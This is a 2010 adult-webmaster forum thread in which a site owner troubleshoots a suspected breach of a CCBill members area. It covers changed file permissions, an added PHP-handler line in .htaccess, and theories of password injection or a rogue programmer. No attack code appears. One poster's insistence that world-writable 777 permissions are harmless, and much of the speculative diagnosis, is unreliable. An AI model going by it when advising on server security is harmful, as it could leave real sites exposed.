GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   Looking for explanation to security breach (https://gfy.com/showthread.php?t=963818)

mmcfadden 04-16-2010 08:17 AM

Looking for explanation to security breach
 
I am trying to figure out what happened to one of my sites.

Bottom line sales were not good for a solid 3 week stretch and then 2 days of nothing. I finally had a test transaction done last night and permission settings for .htpasswd were changed.

I know there are a lot of knowledgeable people on gfy that may know how a scam like this would work. How can I track down what processor would use the changed permission setting and how could I still receive some sales during this stretch. Like it was changed for a period of time then changed back. My host claims they cannot track a change to the settings... only if the file was uploaded. The biggest indicator is a 30 member discrepancy in my password file.

For this to work my page prior to processor change would have had to been replaced as well. Can this be done without me knowing... ie my IP would be recognized and show the correct cc page?

Finally, is there any way for permission settings on password files to be inadvertently changed by some hosting anomaly?

BestXXXPorn 04-16-2010 08:28 AM

Are you on a dedicated box or a shared box?

What OS?

Is FTP enabled?

Is SSH restricted by IP or open?

Do you use auth keys? Could anyone have taken your private key?

There's a million ways it "could" happen so it's hard to have any idea without more information... The devil is in the details...

VGeorgie 04-16-2010 09:00 AM

Could happen if the host has to do a restore and the settings aren't right (has happened to me with a particular host known around here, so I imagine it could happen elsewhere). They should tell you if they did, but the tech may not be looking at the right place to see it, and let you know.

But, how would a change to your htpasswd file affect sales? If anything, you'd be getting the sales, but members wouldn't be added. If you're using CCBill for the biller, you should get an e-mail if their JPOST script fails on an add because of a bad or missing htpasswd file.

plsureking 04-16-2010 09:08 AM

ya if it is actually a hack, they could have figured out the path to your htpass file and then injected a script to edit it. or they could be hacking the biller script if it is discoverable.

i doubt it was a hack tho. most likely just a screwed up script somewhere.

you should be using separate pass files for each biller too. all with unique unguessable names.

mmcfadden 04-16-2010 09:50 AM

Quote:

Originally Posted by VGeorgie (Post 17038141)
Could happen if the host has to do a restore and the settings aren't right (has happened to me with a particular host known around here, so I imagine it could happen elsewhere). They should tell you if they did, but the tech may not be looking at the right place to see it, and let you know.

But, how would a change to your htpasswd file affect sales? If anything, you'd be getting the sales, but members wouldn't be added. If you're using CCBill for the biller, you should get an e-mail if their JPOST script fails on an add because of a bad or missing htpasswd file.

What host?

Sales will not go through as ccbill explained to me. They tried last night and it didn't even register as a submission...

Sales have been minimal for a couple weeks now so either my settings were changed 2 days ago (2 days of solid zero sales) or like you say... sales can still squeeze through once in a while.

I don't know... people that work on the site have (actually had) FTP access.

VGeorgie 04-16-2010 10:31 AM

I left the host several years ago and there's no reason to go muckraking. Needless to say, they have a spotty record here, so if you use them, you'll know by their rep if you should be staying around.

When this happened to me the sale went through, but I caught it early enough to manually fix the problem and I got credited. Don't know if they've changed things since then.

You can look at your CCBill error log (it's in a directory under your CCBill posting script, in your CGI directory) to see if there were problems with other transactions. And, go into your CCBill admin and make sure you are set to get e-mails for posting errors.

(I just checked, and the one place to put in an e-mail for these warnings says it only works with STORED user names. I do use those now, but didn't when I got the error message way back when. You may want to ask Client Support for help here.)

As for a hack changing the permissions to (apparently) make it unwritable, why would they do that? Generally they just try to snag it so they can hack it offline. They don't do anything to make you suspicious that there was a break in. More likely the file was inadvertently changed by someone with authorized access.

mmcfadden 04-16-2010 01:55 PM

My error log stopped working on 3-30-10. It had permission settings changed so nothing could be written to it.

Found this code in htaccess within /members. any ideas?? It's not ccbill's code

AddType application/x-httpd-php .html .htm

mmcfadden 04-16-2010 02:10 PM

Quote:

Originally Posted by VGeorgie (Post 17038466)
I left the host several years ago and there's no reason to go muckraking. Needless to say, they have a spotty record here, so if you use them, you'll know by their rep if you should be staying around.

How about you just ICQ me the name (and let me know it was you)? I just want to know what is happening but too many things wrong for just permission settings inadvertently changed

sortie 04-16-2010 02:43 PM

Quote:

Originally Posted by mmcfadden (Post 17038977)
My error log stopped working on 3-30-10. It had permission settings changed so nothing could be written to it.

Found this code in htaccess within /members. any ideas?? It's not ccbill's code

AddType application/x-httpd-php .html .htm

That code is making all your html pages execute as php. (I believe :warning)

So, you either needed that and did it yourself for the most dumb reason or
you don't really have many php pages so the hacker has to put his php inside
you html pages for them to execute or the hacker just wanted to infect all files.

If you didn't "secure" the ccbill member script then you could
get a hacker doing sign ups.

sortie 04-16-2010 02:49 PM

Quote:

Originally Posted by sortie (Post 17039135)
That code is making all your html pages execute as php. (I believe :warning)

So, you either needed that and did it yourself for the most dumb reason or
you don't really have many php pages so the hacker has to put his php inside
you html pages for them to execute or the hacker just wanted to infect all files.

If you didn't "secure" the ccbill member script then you could
get a hacker doing sign ups.

I take back the part about doing that for "the most dumb reason"; there are
good reasons to actually do that. Just not the way I do things.

TheDoc 04-16-2010 02:52 PM

It sounds like your harddrive / temp areas are full. When my log files quit working, .htpasswd files stop logging, anything like that - it's always something is full.

mmcfadden 04-16-2010 02:52 PM

Quote:

Originally Posted by sortie (Post 17039135)
That code is making all your html pages execute as php. (I believe :warning)

So, you either needed that and did it yourself for the most dumb reason or
you don't really have many php pages so the hacker has to put his php inside
you html pages for them to execute or the hacker just wanted to infect all files.

If you didn't "secure" the ccbill member script then you could
get a hacker doing sign ups.

Ok so lets say he dumped code into my html files... thousands of files actually that he could have dumped code into actually.

Besides just fucking up my site how would he be scraping the sales?

TheDoc 04-16-2010 02:53 PM

Quote:

Originally Posted by mmcfadden (Post 17038977)
AddType application/x-httpd-php .html .htm


Quote:

Originally Posted by sortie (Post 17039135)
That code is making all your html pages execute as php. (I believe :warning)

Correct.... it's nothing bad, just makes html pages execute php within them rather than having to name everything .php - lots of scripts require this.

ProG 04-16-2010 02:55 PM

I hope you are storing the htpasswd file outside of the DocumentRoot? What reason would someone have to make the file unwritable? Does ccbill validate the usernames in the file?

Perhaps your server ran out of space? Do you have rotating logs?

ProG 04-16-2010 02:59 PM

Quote:

Originally Posted by mmcfadden (Post 17039163)
Ok so lets say he dumped code into my html files... thousands of files actually that he could have dumped code into actually.

Besides just fucking up my site how would he be scraping the sales?

Typically they put a an iframe into every page that loads something with spyware, virus, etc. If a surfer hits your page and his anti-virus goes off, I doubt he is going to signup.

mmcfadden 04-16-2010 03:01 PM

Quote:

Originally Posted by TheDoc (Post 17039170)
Correct.... it's nothing bad, just makes html pages execute php within them rather than having to name everything .php - lots of scripts require this.

Ok... so would a java popup require this? But even so an htaccess ccbill code is required in /members. That's how the members log in. That code replaced the ccbill code and users were still able to log-in because I have not received any complaints over the past couple weeks.

It is not a server or space issue... have a dedicated server with tons of space available.

TheDoc 04-16-2010 03:11 PM

Quote:

Originally Posted by mmcfadden (Post 17039186)
Ok... so would a java popup require this? But even so an htaccess ccbill code is required in /members. That's how the members log in. That code replaced the ccbill code and users were still able to log-in because I have not received any complaints over the past couple weeks.

It is not a server or space issue... have a dedicated server with tons of space available.

js wouldn't require that, only php would..

When your temp areas fill up, your hd space can look fine... Every server has some /dev/, /logs or /etc/temp or some crap folders that sometimes screws up and doesn't empty - and aren't on the main drive space. It can mess with your .htpasswd files, locking and unlocking them longer than it should - screwing with permissions, missing record inserts, yet still seem like it works to you and most users.

sortie 04-16-2010 03:15 PM

Quote:

Originally Posted by mmcfadden (Post 17039163)
Ok so lets say he dumped code into my html files... thousands of files actually that he could have dumped code into actually.

Besides just fucking up my site how would he be scraping the sales?

If he planted a php script onto your site then members logging in will go thru his
php hack. Every member has to enter the "members directory" and that's when
the code in your htaccess will parse the html page as php and execute his hack
and let surfers in for free or what ever the hack script wants; like chmod errorlog.txt
to "444".

mmcfadden 04-16-2010 03:18 PM

Quote:

Originally Posted by TheDoc (Post 17039218)
js wouldn't require that, only php would..

When your temp areas fill up, your hd space can look fine... Every server has some /dev/ or /etc/temp or some crap folder that sometimes screws up and doesn't empty. It can mess with your .htpasswd files, locking and unlocking them longer than it should - screwing with permissions, missing record inserts, yet still seem like it works to you and most users.

I just got a new server last month with way more capacity then required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepency in my password file with the changed permission settings.

EDepth 04-16-2010 03:25 PM

Quote:

Originally Posted by mmcfadden (Post 17039241)
I just got a new server last month with way more capacity then required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepency in my password file with the changed permission settings.

That addtype line was added to hide exploits within html. Could be to install virus's, add passwords remotely, or whatever. But guaranteed you have exploits on your server hidden.

TheDoc 04-16-2010 03:25 PM

Quote:

Originally Posted by mmcfadden (Post 17039241)
I just got a new server last month with way more capacity then required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepency in my password file with the changed permission settings.

Some people are straight up douche bags.... they aren't in it for the money, they get off knowing they fucked shit up.


Knowing you moved to a new server, it could be a hack - but it's not like new servers don't screw up at times either. May want to start over to make sure you clear out any issues, hacks, bad setups, etc.

sortie 04-16-2010 03:26 PM

Quote:

Originally Posted by mmcfadden (Post 17039241)
I just got a new server last month with way more capacity then required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepency in my password file with the changed permission settings.

The hack doesn't stop you from making normal sales.

Why do this? Password trading!!!!

The hack will load passwords into your file but it will not show up as a sale
from ccbill. Sales from ccbill will still go thru; but if your site is all over the
password trading sites then the surfers are using that instead of signing up.
Therefore signups are down.

I'm not claiming 100% this is happening; just saying from knowledge of working
with the system and my programming background that this is a very strong possibility.

sortie 04-16-2010 03:30 PM

Did the .htpasswd file have a chage of permissions also?

mmcfadden 04-16-2010 03:36 PM

Quote:

Originally Posted by sortie (Post 17039270)
Did the .htpasswd file have a chage of permissions also?

yes... it was changed to 775.. should have been 666

sortie 04-16-2010 03:47 PM

Quote:

Originally Posted by mmcfadden (Post 17039283)
yes... it was changed to 775.. should have been 666

Ok, then that explains how your sales are still going thru.

755 on some servers will allow the ccbill script to record sign ups.

mmcfadden 04-16-2010 03:50 PM

Quote:

Originally Posted by sortie (Post 17039302)
Ok, then that explains how your sales are still going thru.

755 on some servers will allow the ccbill script to record sign ups.

It was 775 though... not 755 (this was actually told to me and not verified)... another story which I was really clear I did not want anything changed until I had an archived copy of everything

sortie 04-16-2010 04:02 PM

Quote:

Originally Posted by mmcfadden (Post 17039307)
It was 775 though... not 755 (this was actually told to me and not verified)... another story which I was really clear I did not want anything changed until I had an archived copy of everything

Email me the name of your host please : tube at econfirmpro dot com.

VGeorgie 04-16-2010 04:05 PM

666 is less secure than 755 (or 775 for that matter), and there's no real reason for a hacker to have modified your files so. I still looks like a crummy tar and restore job. Or just some sloppy admining. You said people had FTP access. Maybe one of them did it, especially if you didn't change the password when they were done moving your site.

I don't bother with ICQ. If you trust your host, then you trust them. If not...

To be fair, when this happened to me I was on a virtual plan. I switched to a dedicated plan for a few months, and fewer really bad mistakes happened.

VGeorgie 04-16-2010 04:12 PM

I'll add that sales to my site have been really slow the bulk of this week, and particularly bad today, even though it's a Friday, near the 15th, and a payday for many people. My site hasn't been hacked, my file permissions are correct, and I haven't moved my site.

I have nothing to blame my poor sales on other than tubes, too much free porn, the week after Easter and Passover, volcanic ash in Europe, the Democrats, the Republicans, the Tea Party, Sarah Palin, Michael Palin,...

(I'm not really making light of your situation, and it's a PITA to have to double check a host's work. I'm just saying there could be other reasons for the bad sales days.)

sortie 04-16-2010 04:15 PM

Quote:

Originally Posted by VGeorgie (Post 17039345)
666 is less secure than 755 (or 775 for that matter)


That is old/bad information and actually is an indicator that your host is complete fucking
shit. If you fear setting a file to 777 then you're already fucked.

If you are on a secure server with no holes in your scripts then there is no way
I can hack your site just because you set every file to 777.

I wish people would quit repeating this bullshit.

If your host says "you were hacked because you had files set to 777" then you are
crazy to keep hosting there.

VGeorgie 04-16-2010 04:29 PM

Well I wouldn't want to tempt fate. At least 7?5 is not writable by the web server.

Besides, I still don't think he was hacked, and only a dim hacker would change file permission from 666 to 7?5, because he'd get more mileage keeping it at 666. That's the point I was trying to make.

mmcfadden 04-16-2010 05:04 PM

Quote:

Originally Posted by sortie (Post 17039336)
Email me the name of your host please : tube at econfirmpro dot com.

sent it... i don't think it was the host... the programmer I gave ftp access to is my suspicion. But I want to know how he made money from it... then i'll pursue that

sortie 04-16-2010 05:08 PM

Quote:

Originally Posted by VGeorgie (Post 17039415)
Well I wouldn't want to tempt fate. At least 7?5 is not writable by the web server.

Besides, I still don't think he was hacked, and only a dim hacker would change file permission from 666 to 7?5, because he'd get more mileage keeping it at 666. That's the point I was trying to make.


No, wrong again!!!!!!!!!!!!!!!


That's why you should stop repeating this bullshit.

If I get on your server thru a script then I can chmod any file to whatever I want
so what difference does it make what you set it to???

I already said that 755 will let the ccbill script work the same and clearly the
permissions were change. He already said that.

So telling him to set permission to 666 means bullshit since the hacker changed it to 755
anyway.


This debate is so old and so stupid to any decent programmer but
no way can we ever stop this information from spreading.

If your host told you to change your 777 files to 755/744/766/etc because of security
issues then your host is shit!! OK!!!!


Look at it this way : I am telling you that there are no 777's of Mass Destruction!

Stop looking for them! :1orglaugh


Look for a decent hosting company instead.

VGeorgie 04-16-2010 06:09 PM

I never told him to change it to 666. That's the standard setting CCBill does when they install their scripts. That's what the permissions WERE. Whether or not other permissions work is not the point. No hacker is going to bother changing them to 775 or 755 because as you say it wouldn't matter if they've already hacked the site. Just keep at 666 then no one wouldn't have known the difference.

I don't think it's too much to ask to not read things into something I didn't write.

My other point is that there is no need to have more permissive settings than what's needed to get the job done. That's just common sense, for everything, not just servers.

mmcfadden 04-16-2010 06:14 PM

Quote:

Originally Posted by VGeorgie (Post 17039627)
I never told him to change it to 666. That's the standard setting CCBill does when they install their scripts. That's what the permissions WERE. Whether or not other permissions work is not the point. No hacker is going to bother changing them to 775 or 755 because as you say it wouldn't matter if they've already hacked the site. Just keep at 666 then no one wouldn't have known the difference.

I don't think it's too much to ask to not read things into something I didn't write.

My other point is that there is no need to have more permissive settings than what's needed to get the job done. That's just common sense, for everything, not just servers.

it's not a hacker... it would be the programmer I gave full FTP access to.

My question remains are there any processors out there that would write to htpasswd file set at 775 and collect the money?

I have no idea but not a sale today either... never, never has happened since I opened the site.

Maybe check it out and see if anything comes up? I have accessed so many times and I see nothing out of the ordinary by going to the site.

www.vstrippoker.com

mmcfadden 04-16-2010 06:24 PM

Quote:

Originally Posted by EDepth (Post 17039259)
That addtype line was added to hide exploits within html. Could be to install virus's, add passwords remotely, or whatever. But guaranteed you have exploits on your server hidden.

So what would I look for written into html... that code in htaccess is obviously gone but now what do I need to try and find?

VGeorgie 04-16-2010 06:37 PM

This is all I'm going to say on the matter because there are people who seem to itch at misreading what others write.

You can do your own transaction tests through CCBill. Assuming you haven't done this before:

Go to your admin panel, find the Test Transactions tab, and enter your e-mail and IP information. Note the dummy MC and Visa card numbers to use for the test.

Go to your site, fill out your subscription form, and provide the dummy card number. Be sure you give the right e-mail address, and you are connected from the IP you said you would.

If the transaction is successful you'll be shown your usual welcome page. If not, you'll see that, too. If successful, check your htpasswd file for the just-added username and password. (It will be deleted automatically in a day, so just leave it if it's there.)

Use this method any time to see if the CCBill setup is working. No guess work needed.

EDepth 04-16-2010 06:40 PM

Quote:

Originally Posted by mmcfadden (Post 17039652)
So what would I look for written into html... that code in htaccess is obviously gone but now what do I need to try and find?

Your host most likely has a script they can run on your server to find exploits.

VGeorgie 04-16-2010 06:41 PM

Okay, next to the last thing. Here's the last:

You can also test the user management function of CCBill just by doing a Manual Add. That's in the (as I recall) Member's tab. Select the specific account, then click Manual Add. Provide a username/password. You're told if the add was successful or not. Verify the username and password has been added to your site.

You should do a Manual Remove after the test.

You can perform these steps whenever you make a change to your site that you think might impact the user management aspects.

mmcfadden 04-16-2010 06:42 PM

I know that... that's how I found the problem last night doing a test transaction.

Now the files have been replaced that were fucked but I don't think the site is ok... I think there is still code jammed all over the place and likely need to replace the whole fucking thing from a month ago.

But... someone has screwed with my site, that is certain, all I want to know is if they made money from it. So that is why I keep asking if a processor that anybody may know of will post to htpasswd file with the code 775 in it??

Then I do what I need to do.

sortie 04-16-2010 07:56 PM

Quote:

Originally Posted by VGeorgie (Post 17039627)
I never told him to change it to 666. That's the standard setting CCBill does when they install their scripts. That's what the permissions WERE. Whether or not other permissions work is not the point. No hacker is going to bother changing them to 775 or 755 because as you say it wouldn't matter if they've already hacked the site. Just keep at 666 then no one wouldn't have known the difference.

I don't think it's too much to ask to not read things into something I didn't write.

My other point is that there is no need to have more permissive settings than what's needed to get the job done. That's just common sense, for everything, not just servers.


You are assuming that you know exactly what the hacker is trying to do.

Scenario :

If the hacker chown/chgrp the file in addition to chmod 755 then this can make the
file unchangeable by the website owner when he logs into FTP. (at least some servers)
The webmaster is no longer the owner of the file and needs 666, but can't
change it to 666 himself because he is not the file owner anymore.
So now we have a file full of hacked passwords that we can't change thru FTP.

This can be fixed, but is just one more way to slow the fix down.

There are other things possible too.

mmcfadden 04-16-2010 08:16 PM

its great... the programmer I suspect but never accused personally has vanished as soon as I mentioned my password files were fucked with.

I don't know, maybe just me, but somebody who was paid to make sure the site was up to snuff just decides to log off ICQ and not answer after I mention I have a security problem (10 am this morning is when I said it) is gone? hmmm

so crazy... i just can't understand how he would have benefited from this.

sortie 04-16-2010 08:26 PM

Quote:

Originally Posted by mmcfadden (Post 17039796)
its great... the programmer I suspect but never accused personally has vanished as soon as I mentioned my password files were fucked with.

I don't know, maybe just me, but somebody who was paid to make sure the site was up to snuff just decides to log off ICQ and not answer after I mention I have a security problem (10 am this morning is when I said it) is gone? hmmm

so crazy... i just can't understand how he would have benefited from this.

If it's the programmer then this is the first time on GFY I saw that happen.

Maybe the only benefit is exploits to download on surfers.

mmcfadden 04-16-2010 08:34 PM

Quote:

Originally Posted by sortie (Post 17039809)
If it's the programmer then this is the first time on GFY I saw that happen.

Maybe the only benefit is exploits to download on surfers.

3 FTP passwords were given out and active over the past 3 weeks. Programmer, CCbill, my host.

I don't think my site was hacked...

LoveSandra 04-17-2010 03:51 AM

see my sig


All times are GMT -7. The time now is 07:03 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123